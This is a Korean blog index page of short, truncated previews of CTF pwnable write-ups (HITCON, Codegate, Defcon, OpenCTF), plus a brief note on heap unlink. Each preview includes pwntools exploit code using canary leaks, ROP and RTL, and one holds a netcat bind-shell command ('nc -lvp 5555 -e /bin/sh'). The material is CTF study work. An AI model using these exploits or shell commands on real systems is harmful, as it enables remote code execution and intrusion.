Hacking/Pwnable (15) 썸네일형 리스트형 HITCON 2017 start write up syscall을 이용한 ROP였다. 예전부터 풀어야지 했다가 오늘 풀었따. from pwn import* context.log_level = 'debug' p = process("./start") read = 0x440300 bss = 0x6cdb68 syscall = 0x468e75 prdi = 0x4005d5 prsi = 0x4017f7 prdx = 0x443776 prax_rdx_rbx = 0x47a6e6 pay1 = "a"*25 p.send(pay1) p.recvuntil("a"*24) canary = u64(p.recv(8)) - 0x61 log.info("canary = " + hex(canary)) pay2 = "a"*24 pay2 += p64(canary) pay2 += "b"*8 #rea.. unlink #define unlink(P, BK, FD){ BK = P -> bk; FD = P -> fd; FD -> bk = BK; BK -> fd = FD; } FD = *P + 8 BK = *P + 12 FD + 12 = BK BK +8 = FD unlink 이해가 아직도 안 된다. 이해하고 문제 풀 예정 OpenCTF tyro_heap write up 매우 간단한 heap overflow chunk 2개 만들고 첫번째 chunk에서 overflow 시켜서 두번째 chunk에 puts@plt 있는데 이걸 쉘 함수로 overwrite 해주면 된다. from pwn import* p = process("./tyro_heap") shell = 0x8048660 p.sendline("c") p.recvuntil("::> ") p.sendline("c") p.recvuntil("::> ") p.sendline("b") p.recvuntil(": ") p.sendline("0") p.recvuntil(": ") p.sendline(p32(shell)*10) p.recvuntil("::> ") p.sendline("e") p.recvuntil(": ") p.send.. noe.systems double_input local shell 보호되어 있는 글입니다. Defcon 2015 r0pbaby libc랑 함수 주소를 알려준다. RTL from pwn import* p = process("./r0pbaby_542ee6516410709a1421141501f03760") print p.recvuntil(":") p.sendline("2") print p.recvuntil("Enter symbol: ") p.sendline("system") print p.recvuntil("Symbol system: 0x") system = int(p.recv(16),16) print "system = " + hex(system) pr = system - 0xdb2f binsh = system + 0x1479c7 print p.recvuntil(":") p.sendline("3") p.sendline("32") pa.. Codegate 2018 BaskinRobins31 그냥 ROP from pwn import*context.log_level = 'debug' p = process("./BaskinRobins31")e = ELF("./BaskinRobins31") read_plt = e.plt['read']read_got = e.got['read']write_plt = e.plt['write']puts_plt = e.plt['puts']bss = e.bss()binsh = "/bin/sh\x00"pr = 0x400bc3pppr = 0x40087a pay="A"*176pay+="B"*8pay+=p64(pr)+p64(read_got)+p64(puts_plt)pay+=p64(pppr)+p64(0)+p64(bss)+p64(len(binsh))+p64(read_plt)pay+=p.. Codegate 2017 babypwn 그냥 canary leak + RTL from pwn import* #context.log_level = 'debug' p = remote("localhost",8181) e = ELF("./babypwn") recv_plt = e.plt['recv'] system_plt = e.plt['system'] ppppr = 0x08048eec bss = e.bss() binsh = "/bin/sh>&4 ") p.sendline("1") p.recvuntil(":") pay="A"*41 p.send(pay) print p.recv(44) canary = u32("\x00"+p.recv()[41:44]) print "canary is " + hex(canary) p.recvuntil(">") p.sendline(.. Codegate 2014 nuclear 암호 leak하고 ROP from pwn import* context.log_level = 'debug' p = remote("localhost", 1129) e = ELF("./nuclear") libc = e.libc send_plt = e.plt['send'] send_got = e.got['send'] recv_plt = e.plt['recv'] bss = e.bss() ppppr = 0x0804917c cmd = "nc -lvp 5555 -e /bin/sh" binsh = "/bin/sh 0>&4 1") p.sendline("1.1/1.1") p.recvuntil(">") pay="A"*512 p.send(pay) print p.recv(1024) ''' p.sendline("launch") p.. 이전 1 2 다음
